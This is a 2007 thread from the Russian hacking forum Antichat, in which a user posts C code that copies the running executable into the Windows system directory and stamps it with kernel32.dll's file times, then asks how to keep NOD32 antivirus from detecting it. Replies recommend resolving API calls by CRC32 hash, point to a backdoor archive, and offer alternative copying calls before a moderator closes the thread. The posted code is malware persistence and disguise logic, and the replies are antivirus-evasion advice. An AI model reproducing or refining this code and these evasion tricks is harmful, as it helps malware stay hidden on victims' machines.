Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   CopyToSysDir() Помогите поправить (https://forum.antichat.xyz/showthread.php?t=43553)

razzzar 02.07.2007 20:25
CopyToSysDir() Помогите поправить
 
Функция копирует ехе процесса в системную директорию. Мой нод32 ее палит. помогите испарвить, чтобы не ловилась.
Код:
// ---------------- [ Copy to system directory ] -------------- //

int CopyToSysDir(char * szBuff)
{
        char szExe[256], szNewExe[256], szSysDir[256], szKernl[256], szCurDir[256];
        HANDLE hFile;
        FILETIME aTime, bTime, cTime;

        if ( GetModuleFileName(NULL, szExe, 256) == 0 )
                return 0;

        if ( GetSystemDirectory(szSysDir, 256) == 0 )
                return 0;

        if ( GetCurrentDirectory(256, szCurDir) == 0 )
                return 0;

        if ( (strcmp(szSysDir, szCurDir) == 0) && (strcmp(szExe, EXE_NAME) == 0) )
                return 0;

        lstrcpy(szNewExe, szSysDir);
        lstrcat(szNewExe, "\\");
        lstrcat(szNewExe, EXE_NAME);

        if ( CopyFile(szExe, szNewExe, FALSE) == 0 ) // палится в этом месте
                return 0;

        lstrcpy(szKernl, szSysDir);
        lstrcat(szKernl, "\\");
        lstrcat(szKernl, KERNEL32_DLL);

        hFile = CreateFile(szKernl, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
        if ( hFile != INVALID_HANDLE_VALUE )
        {
                GetFileTime(hFile, &aTime, &bTime, &cTime);
                CloseHandle(hFile);
        }
        else
                return 0;

        hFile = CreateFile(szNewExe, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
        if ( hFile != INVALID_HANDLE_VALUE )
        {
                SetFileTime(hFile, &aTime, &bTime, &cTime);
                CloseHandle(hFile);
        }
        else
                return 0;

        memcpy(szBuff, szNewExe, 256);

        return 1;
}

Ni0x 02.07.2007 23:13
для начала убери прямой вызов апи, можешь использовать crc32

razzzar 03.07.2007 00:40
а можно с примером?

Ni0x 03.07.2007 01:01
http://hellknights.void.ru/releases/el-backdoor-small-v0.02.rar
в нем реализован поиск апи по crc32, разбирайся

razzzar 03.07.2007 01:34
ок. спс.
а больше нету никаких способов изменить код, который палит антивирь? не обязательно тот, что я привел выше

Xserg 03.07.2007 01:44
У меня MoveFileExA не палился.
Сейчас в лом опять NOD ставить, чтобы проверить и с установками экспериментировать.

KEZ 03.07.2007 03:05
как понять палит? палит весь файл по ф-ии или его действия AMON файл-монитором?
ну скоипируй содержимое своего ЕХЕ в созданый в сис. дериктории файл
CreateFile(), WriteFile(), RedFile(), CloseHandle()

хотя, как видно, код ты просто скопипастил, непонимая что означает ни одна строчка.

_Great_ 03.07.2007 10:34
Блин, а ты как хотел? Конечно, палит.

Закрыто по причинам:

1) Ссылок дали достаточно. + еще дам: http://wasm.ru/
2) Блин, да задолбали темы как скрыться от АВ и фаеров. Думайте своей головой


Время: 01:25